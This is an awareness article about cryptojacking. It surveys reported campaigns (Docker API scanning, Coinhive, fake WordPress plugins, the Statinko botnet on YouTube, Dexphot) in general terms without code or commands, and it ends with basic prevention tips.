Cyber criminals are cryptojacking your devices and stealing computing power to mine cryptocurrencies, and they are getting very good at it. It’s one of the major upcoming cyber crimes in recent years. These type of hackers are in search for computing power to run crypto mining software, most of the time Monero. They search for a security weakness, install some software and reap the rewards. This way they are using computing power from companies and common individuals to generate Monero. But how does it work exactly?
Cyber criminals that are cryptojacking aren’t super hackers, but they use existing vulnerabilities to their own benefit. Most of the time they use well known exploits and search for badly updated computers and servers. In other cases they hope that consumers are dumb enough to click on a link, or visit a certain website. It’s all about getting that little piece of software on the other computer and get it running.
American internet security firm Bad Packets discovered ‘opportunistic mass scanning activity’ on Docker servers on November 26th. This is an example of typical cryptojacking activity. Most of the time hackers are just looking for a weakness in one of the APIs. As soon as a weakness is found, they start an Alpine Linux OS container. This software downloads and runs a script, and in addition that script will install XMRRig, which is basic mining software for Monero.
Coinhive was a founding father
Docker servers are enterprise solutions, and it’s not very likely that normal individuals use these at home. That doesn’t mean that you and I are safe though. Cryptojacking happens in all kinds of ways, and for the hackers it doesn’t matter whether they target commercial companies or individuals. Therefore it’s very important to be aware of the possibilities of cryptojacking.
The whole hype about cryptojacking started with Coinhive. This website plugin would use the computing power of the website’s visitors to mine for Monero. The service launched in 2017 as a way for website owners to generate some money, but quickly became the center of internet drama.
Next level crypto crime
Installing a plugin on your website is a simple way to use computing resources from other people. Cryptojacking is on the rise and it’s not very likely to stop any time soon. In 2018 the amount of crypto-mining malware increased with 4467 percent. This number was obviously driven by Coinhive, but it wasn’t the only source. In the first quarter of 2019 the amount of ransomware attacks grew by 188 percent, while crypto mining grew another 29 percent.
A website security company reported in October 2019 that hackers were using vulnerabilities in old WordPress plugins. In addition they would create copies of popular plugins to trick users. When this plugin is installed, it runs an executable that gives the hackers access to the server. Even when the plugin is removed, the hacker still has access. As a result he can use the internet server to mine Monero. In similar fashion hackers are hiding code inside .WAV audio files, which is executed when the file is played.
McAfee Labs reported that cyber crime is becoming a lot more sophisticated. Hackers are searching for vulnerabilities, and any internet device with computing power will do. Last year malware targeting Internet-of-Things (IoT) devices grew with 200 percent. These internet connected devices, like routers and IP cameras, don’t generate lots of mining power, but it’s volume that the hackers are after. Power is in the numbers.
Cryptojacking is in the numbers
A Slovakian software security firm Eset has uncovered that cyber criminals behind the Statinko botnet are now deploying cryptocurrency mining software. To do this they target YouTube and its 2 billion monthly users. They upload videos that resonate well with certain audiences, and provide links to trigger people. Upon clicking, software can be installed on the viewer’s computer.
The hackers behind Statinko aim for users from Russia, Ukraine, Belarus and Kazakthstan. But by moving their criminal activity to YouTube, they could be looking for an expansion. According to Eset already 500 thousand devices have been infected by the mining software. Reportedly YouTube is already removing content and channels that contains traces of Statinko’s code. But it’s unlikely that Statinko will stop, and therefore it’s important for users not to click any links from unknown sources.
Next level cryptojacking malware
They way the cyber criminals spread their cryptojacking malware on YouTube is similar to other hacking campaigns. It’s all about tricking the consumer into clicking and thereby activating certain software. However, sometimes things can get very complicated. On November 26th Microsoft reported on cryptojacking malware called Dexphot. This malware has infected 80 thousand computers worldwide since October 2018.
If someone has XMRRig running on their computer, it’s quite easy to deactivate it. The Dexphot attack however, is much more sophisticated and would even reinstall itself when defenders try to remove the malware. The cryptojacking malware would use all kinds of tactics to evade security, using different entry points.
Dexphot even received regular updates. Underlining the ability to evolve over time into an ever changing threat. This is next level malware, and underlines how important it is to stay safe on the web.
How to prevent cryptojacking
Is your computer becoming slow, or is your processor working overtime? Sounds like your computer might be mining Monero for somebody. Perhaps it’s a good idea to install some quality internet security software. To prevent cryptojacking, live by these golden rules:
- Never click on shady links and websites.
- Never open e-mails and its attachments from unknown sources.
- Install ad blocking browser extensions, or just use Brave.
- Keep your software, browser extensions, and mobile apps up-to-date.
- And if you run a business, keep your APIs closed, and educate your employees!
Also published on Medium.